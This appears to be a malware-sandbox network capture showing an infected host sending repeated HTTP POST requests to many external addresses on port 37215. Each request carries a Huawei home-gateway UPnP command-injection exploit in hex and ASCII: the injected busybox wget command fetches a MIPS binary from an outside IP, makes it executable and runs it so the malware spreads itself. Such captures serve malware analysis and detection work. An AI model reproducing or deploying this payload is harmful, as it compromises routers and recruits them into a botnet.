                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2007192.168.2.133552623.206.132.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574421883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2008192.168.2.134372485.60.201.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574472904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2009192.168.2.135093441.156.39.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574472904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2010192.168.2.1350688157.77.198.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574490070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2011192.168.2.1340150197.16.221.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574501038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2012192.168.2.1343104197.224.56.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574501038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2013192.168.2.135850041.151.59.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574517965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2014192.168.2.134386641.37.121.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574541092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2015192.168.2.1338434197.167.89.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574553013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2016192.168.2.133867041.114.142.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574564934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 